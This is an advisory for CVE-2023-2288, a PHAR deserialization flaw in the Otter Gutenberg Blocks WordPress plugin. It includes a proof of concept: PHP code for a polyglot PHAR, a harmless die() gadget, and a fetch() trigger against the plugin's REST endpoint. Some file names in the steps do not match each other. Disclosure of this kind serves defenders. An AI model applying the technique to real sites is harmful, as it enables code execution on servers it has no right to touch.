Otter – Gutenberg Blocks < 2.2.6 – Author+ PHAR Deserialization | CVE 2023-2288

Description

The plugin does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:// stream wrapper.

Proof of Concept

Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0.

1. Create a PHAR file using the following PHP code in the `create_phar.php` file, and the command `php --define phar.readonly=0 create_phar.php`.

    <?php

    class Evil {}

    // create new Phar
    $phar = new Phar('poc.phar');
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();

2. As an Author user, upload the `poc.phar.jpg` file. Note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).

3. Create a simulated gadget on the server with the following code:

    class Evil {
      function __wakeup() {
        die('Arbitrary deserialization');
      }
    }

4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):

fetch("/wp-json/otter/v1/dynamic?type=author&uid=1234&context=somecontext&fallback=phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.txt")